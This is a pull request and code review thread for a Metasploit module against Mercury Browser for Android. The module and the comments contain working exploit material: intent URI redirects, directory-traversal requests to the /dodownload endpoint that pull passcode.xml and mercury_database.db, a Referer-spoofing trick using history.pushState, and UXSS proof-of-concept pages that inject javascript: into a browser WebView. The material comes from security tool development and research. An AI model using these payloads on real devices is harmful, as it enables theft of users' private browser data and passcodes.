### PR TITLE
Add Android Mercury Browser Intent URI Scheme & Traversal

### PR DESCRIPTION
**Pull request by wchen-r7**
To test:

If you're in the office, you can just find me to test the vulnerable device.
- [x] Need an android device with wifi
- [x] Install Mercury Browser (I tested with [3.1.1](http://www.apk4fun.com/apk/51864/))
- [x] Start msfconsole
- [x] Use android_mercury_parseuri
- [x] Browse the URL with Mercury. What happens here is you should see the Wifi-Transfer plugin on the device, and then the module should connect to the web server, and then grabs some files. Like this:

screen shot 2015-09-17 at 10 12 04 am

### CODE REVIEW

File: modules/auxiliary/server/android_mercury_parseuri.rb [hunk 1]
```diff
@@ -0,0 +1,118 @@
...
+    <body>
+    <script>
+    location.href="intent:#Intent;SEL;component=com.ilegendsoft.mercury/.external.wfm.ui.WFMActivity2;action=android.intent.action.VIEW;end";
+    </script>
+    </body>
+    </html>
+    |
+  end
+
+  def on_request_uri(ci, req)
```
Comment (void-in) [inline modules/auxiliary/server/android_mercury_parseuri.rb]: A typo here. The first argument should be cli

File: modules/auxiliary/server/android_mercury_parseuri.rb [hunk 2]
```diff
@@ -0,0 +1,118 @@
...
+      cli.close
+    end
+
+    res
+  end
+
+  def get_xml_files(rhost)
+    base_dir = '../../../../data/data/com.ilegendsoft.mercury'
+
+    ['mercury_database.db', '/shared_prefs/passcode.xml'].each do |item|
```
Comment (espreto) [inline modules/auxiliary/server/android_mercury_parseuri.rb]: Without the slash here, the result is:
```
../../../../data/data/com.ilegendsoft.mercurymercury_database.db
```

File: modules/auxiliary/server/android_mercury_parseuri.rb (hunk 1 above)
Comment (wchen-r7) [inline modules/auxiliary/server/android_mercury_parseuri.rb]: oops

File: modules/auxiliary/server/android_mercury_parseuri.rb (hunk 2 above)
Comment (wchen-r7) [inline modules/auxiliary/server/android_mercury_parseuri.rb]: oops

**Comment by joevennix** [comment]
Needing to be on the same wifi network as the device is kind of a bummer... It would be more useful to have a generic exploit. Out of the box Same Origin Policy will prevent the exploit HTML from XHR'ing the localhost:8888/dodownload endpoint, but looking at the blog post on this, I can see a way around this... There is a /doupload endpoint that your exploit page can POST to. Use that to upload an HTML file via XHR, then browse an iframe to the path for that HTML file on localhost:8888/. The HTML file will be same-origin with the /dodownload route, and you can use XHR to download from /dodownload and send it back up to your aux module.

**Comment by wvu-r7** [comment]
@joevennix: Nice trick!

**Comment by wchen-r7** [comment]
@joevennix I'm not able to get your technique to work because my XHR script needs to modify the Referer header, and looks like this isn't allowed in XHR.

This is the script I wrote:

```html
<script>
function download_file(path) {
  var xhr = new XMLHttpRequest();
  if (xhr.overrideMimeType) {
    xhr.overrideMimeType("text/plain; charset=x-user-defined");
  }
  xhr.open('GET', path, false);
  //Can't modify Referer
  //xhr.setRequestHeader("Referer", "http://192.168.1.119:8888/");
  xhr.send(null);
  if (xhr.readyState == 4 && xhr.status == 200) {
    return xhr.responseText;
  }
  return null;
}

alert('begin');
var f = download_file('/dodownload?fname=../../../../data/data/com.ilegendsoft.mercury/shared_prefs/passcode.xml');
alert('test!');
alert(f);
</script>
```

The script will send a request like this:

```
GET /dodownload?fname=../../../../data/data/com.ilegendsoft.mercury/shared_prefs/passcode.xml HTTP/1.1
Host: 192.168.1.119:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.119:8888/storage/emulated/0/My%20Documents/test2.html
Connection: keep-alive
Cache-Control: max-age=0
```

With the above request, instead of the actual xml file, the web server returns an empty zip file.

However, if you modify the Referer like the following request:

```
GET /dodownload?fname=../../../../data/data/com.ilegendsoft.mercury/shared_prefs/passcode.xml HTTP/1.1
Host: 192.168.1.119:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.119:8888/storage/emulated/0/My%20Documents/
Connection: keep-alive
Cache-Control: max-age=0
```

You get the actual XML file:

screen shot 2015-09-16 at 7 56 04 pm

The Referer header needs to be a directory.

**Comment by joevennix** [comment]
@wchen-r7 A quick way to get the referer to any path you want is `history.pushState({},{},"/storage/emulated/0/Download/");`

**Comment by wchen-r7** [comment]
@joevennix Oh sweet, yeah that trick works for me. Working on the rest, thanks!

**Comment by joevennix** [comment]
@wchen-r7 I was poking at this a bit. You can alternately use the uxss described [here](http://versprite.com/og/multiple-vulnerabilities-in-mercury-browser-for-android-version-3-0-0/) to steal the files:

```
<html>
<body>
<script>
location.href="intent:#Intent;SEL;component=com.ilegendsoft.mercury/.external.wfm.ui.WFMActivity2;action=android.intent.action.VIEW;end";
setTimeout(function() {
location.href="intent:#Intent;S.load=javascript:"+encodeURIComponent("var q=window.open('http://localhost:8888/','x');q.onload=function(){alert(q.document.body.innerHTML);};")+";SEL;component=com.ilegendsoft.mercury/com.ilegendsoft.social.common.SimpleWebViewActivity;end";
}, 1000);
</script>
</body>
</html>
```

**Comment by joevennix** [comment]
PoC that steals `msapplication.xml`; although `./databases/webview.db` etc is probably the best target imho

```<html>
<body>
<script>
location.href="intent:#Intent;SEL;component=com.ilegendsoft.mercury/.external.wfm.ui.WFMActivity2;action=android.intent.action.VIEW;end";
setTimeout(function() {
location.href="intent:#Intent;S.load=javascript:"+encodeURIComponent("var q=window.open('http://localhost:8888/','x');q.onload=function(){q.eval(atob('"+btoa("history.replaceState({},{},'/storage/emulated/0/Download/');var x=new XMLHttpRequest();x.open('GET', '/dodownload?fname=../../../../data/data/com.ilegendsoft.mercury/shared_prefs/mapplication.xml');x.send();x.onload=function(){alert(x.responseText);};")+"'));};")+";SEL;component=com.ilegendsoft.mercury/com.ilegendsoft.social.common.SimpleWebViewActivity;end";
}, 1000);
</script>
</body>
</html>```

**Comment by wchen-r7** [comment]
@joevennix if you'd like, please patch me. My patch takes the path you originally suggested, and that ends up having some timing issues (has to make sure the web server is up, and my html file is uploaded).

**Comment by wchen-r7** [comment]
@joevennix Updated the module with yours. It works for me well. Thanks! What version of Mercury do you have by the way?

**Comment by wchen-r7** [comment]
This pull request is ready for review again.

**Comment by wvu-r7** [comment]
Working on my setup but not with ```URIPATH=/```.

**Comment by wchen-r7** [comment]
double checked again. It works with uripath=/, but my device is slow so sometimes it looks like it's not working.

**Comment by wvu-r7** [comment]
@wchen-r7: Thanks!

**Comment by wvu-r7** [comment]
Landing this, @wchen-r7. Thanks for the hax, @joevennix. :)

**Comment by joevennix** [comment]
anytime ;)

**Pull request merged**